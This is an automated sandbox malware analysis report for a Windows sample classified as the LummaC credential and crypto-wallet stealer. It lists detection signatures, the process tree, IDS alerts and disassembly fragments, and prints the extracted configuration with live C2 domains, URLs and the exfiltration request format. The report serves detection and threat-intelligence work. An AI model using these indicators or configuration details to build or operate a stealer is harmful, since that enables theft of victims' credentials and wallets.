Edit tour

Windows Analysis Report
J18zxRjOes.exe

Overview

General Information

Sample name:	J18zxRjOes.exe renamed because original name is a hash value
Original sample name:	75a2daff1ea8532d28cfba008de10a40.exe
Analysis ID:	1584186
MD5:	75a2daff1ea8532d28cfba008de10a40
SHA1:	7bc7ee781536ce083209c3a88123b2388ac7d200
SHA256:	2ac05e705652a1fc55b355a3822fdcfee4afab2b157af108a6777532e1b2044a
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

J18zxRjOes.exe (PID: 6288 cmdline: "C:\Users\user\Desktop\J18zxRjOes.exe" MD5: 75A2DAFF1EA8532D28CFBA008DE10A40)

628E.tmp.exe (PID: 1036 cmdline: "C:\Users\user\AppData\Local\Temp\628E.tmp.exe" MD5: 7A3E26158D0BF299838749875FEB6232)

WerFault.exe (PID: 6680 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1796 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "cloudewahsj.shop", "nearycrepso.shop", "wholersorie.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "4h5VfH--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1736228708.00000000020A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.3948087329.00000000005F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3948125389.0000000000630000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000003.00000002.1730668845.000000000054A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 628E.tmp.exe PID: 1036	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 628E.tmp.exe PID: 1036	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 628E.tmp.exe PID: 1036	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:29.851063+0100	2028371	3	Unknown Traffic	192.168.2.8	49710	104.21.48.1	443	TCP
2025-01-04T15:33:30.783155+0100	2028371	3	Unknown Traffic	192.168.2.8	49711	104.21.48.1	443	TCP
2025-01-04T15:33:32.141058+0100	2028371	3	Unknown Traffic	192.168.2.8	49712	104.21.48.1	443	TCP
2025-01-04T15:33:33.307851+0100	2028371	3	Unknown Traffic	192.168.2.8	49714	104.21.48.1	443	TCP
2025-01-04T15:33:35.148125+0100	2028371	3	Unknown Traffic	192.168.2.8	49717	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:30.308802+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49710	104.21.48.1	443	TCP
2025-01-04T15:33:31.294966+0100	2054653	1	A Network Trojan was detected	192.168.2.8	49711	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:30.308802+0100	2049836	1	A Network Trojan was detected	192.168.2.8	49710	104.21.48.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:31.294966+0100	2049812	1	A Network Trojan was detected	192.168.2.8	49711	104.21.48.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (cloudewahsj .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:29.851063+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.8	49710	104.21.48.1	443	TCP
2025-01-04T15:33:30.783155+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.8	49711	104.21.48.1	443	TCP
2025-01-04T15:33:32.141058+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.8	49712	104.21.48.1	443	TCP
2025-01-04T15:33:33.307851+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.8	49714	104.21.48.1	443	TCP
2025-01-04T15:33:35.148125+0100	2058607	1	Domain Observed Used for C2 Detected	192.168.2.8	49717	104.21.48.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:29.349927+0100	2058606	1	Domain Observed Used for C2 Detected	192.168.2.8	65229	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:32.694819+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49712	104.21.48.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-04T15:33:20.958821+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49708	104.21.56.70	443	TCP
2025-01-04T15:33:21.822713+0100	2803274	2	Potentially Bad Traffic	192.168.2.8	49709	176.113.115.19	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: J18zxRjOes.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEllWB	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/api	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/apiL	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/apiR	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEram	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEi	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/track_prt.php?sub=0&cc=DES	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/A	Avira URL Cloud: Label: malware
Source: https://post-to-me.com/u	Avira URL Cloud: Label: malware
Source: https://cloudewahsj.shop/apic	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1306978
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1306978

Found malware configuration

Source: 3.2.628E.tmp.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "abruptyopsn.shop", "rabidcowse.shop", "cloudewahsj.shop", "nearycrepso.shop", "wholersorie.shop", "noisycuttej.shop", "framekgirus.shop"], "Build id": "4h5VfH--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	ReversingLabs: Detection: 39%

Multi AV Scanner detection for submitted file

Source: J18zxRjOes.exe	ReversingLabs: Detection: 47%
Source: J18zxRjOes.exe	Virustotal: Detection: 39%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: J18zxRjOes.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: rabidcowse.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: noisycuttej.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: tirepublicerj.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: framekgirus.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: wholersorie.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: abruptyopsn.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: nearycrepso.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: cloudewahsj.shop
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000003.00000002.1736486987.00000000020D0000.00000040.00001000.00020000.00000000.sdmp	String decryptor: 4h5VfH--

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe

Code function: 3_2_00415D89 CryptUnprotectData,

3_2_00415D89

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Unpacked PE file: 0.2.J18zxRjOes.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Unpacked PE file: 3.2.628E.tmp.exe.400000.0.unpack

Source: J18zxRjOes.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\J18zxRjOes.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.8:49717 version: TLS 1.2

Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_004389F2 FindFirstFileExW,		0_2_004389F2
Source: C:\Users\user\Desktop\J18zxRjOes.exe	Code function: 0_2_00668C59 FindFirstFileExW,		0_2_00668C59

Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	3_2_00441816
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov eax, esi	3_2_0043D0D0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]	3_2_0043D0D0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]	3_2_0040C080
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00422370
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [edx], cx	3_2_00418BA2
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]	3_2_00417054
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]	3_2_0041B021
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_0041B021
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004438E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004438F9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004438FB
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]	3_2_00422880
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebx, bx	3_2_00427885
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_0041F170
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov dword ptr [ebp-2Ch], eax	3_2_004421E9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi+10h], 00000000h	3_2_004421E9
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [esi]	3_2_0041618C
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	3_2_0041BA52
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov esi, ecx	3_2_0041BA52
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0041BA52
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	3_2_00402210
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_0043A230
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	3_2_004442E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_00431AF5
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]	3_2_0040B280
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_00440A90
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+01h]	3_2_00441B50
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_00409360
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042FB7D
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	3_2_00408320
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_00419B30
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_0041F3E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041B3F2
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_0041AB90
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then jmp ecx	3_2_00428C62
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_00427C10
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B884A2Eh	3_2_00444C20
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]	3_2_00414C30
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_00418492
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, word ptr [ebx]	3_2_0043CD40
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042C5E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041B58F
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_2_004195B6
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_2_004195B6
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov edi, edx	3_2_0043E6E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	3_2_0043E6E0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, edx	3_2_00430F4E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, edx	3_2_00430F54
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [ebx], ax	3_2_0041A770
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, edx	3_2_00430F03
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042F716
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_00407730
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_00407730
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]	3_2_00427FC0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]	3_2_00427FC0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+edi+02h]	3_2_004437D0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+04h]	3_2_0042A7F0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov edx, ecx	3_2_0042A7F0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_00427FFD
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov edx, ecx	3_2_0042AF92
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042AF92
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov edx, ecx	3_2_0042AFB0
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000D1h]	3_2_020E5202
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [edx], cx	3_2_020E921E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_020FB247
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, eax	3_2_020F8264
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+7E534795h]	3_2_020EB288
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [ebx], al	3_2_020EB288
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+7C605D08h]	3_2_020F829E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1CAAACA4h]	3_2_020E72BB
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]	3_2_020DC2E7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov eax, esi	3_2_0210D337
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-533305EEh]	3_2_0210D337
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	3_2_020EF3D7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, edx	3_2_0210116A
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, edx	3_2_021011B5
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov ecx, edx	3_2_021011BB
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_020EF647
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_020EB659
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-209D22B7h]	3_2_020F8677
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp al, 20h	3_2_020D275E
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_020EB7F6
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov dword ptr [ebp-2Ch], eax	3_2_02112450
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi+10h], 00000000h	3_2_02112450
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov dword ptr [esi], FFFFFFFFh	3_2_020D2477
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_0210A497
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+0Bh]	3_2_020DB4E7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov edi, dword ptr [esp+18h]	3_2_020E5527
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, word ptr [eax]	3_2_02114547
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+edi]	3_2_020D8587
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov byte ptr [edi], bl	3_2_020D95C7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_020F25D7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then mov edi, edx	3_2_0210EA3F
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+482C66D0h]	3_2_020F2AE7
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx ebx, bx	3_2_020F7B02
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then movzx eax, word ptr [edx]	3_2_0210EB27
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_2_020E981D
Source: C:\Users\user\AppData\Local\Temp\628E.tmp.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	3_2_020E981D
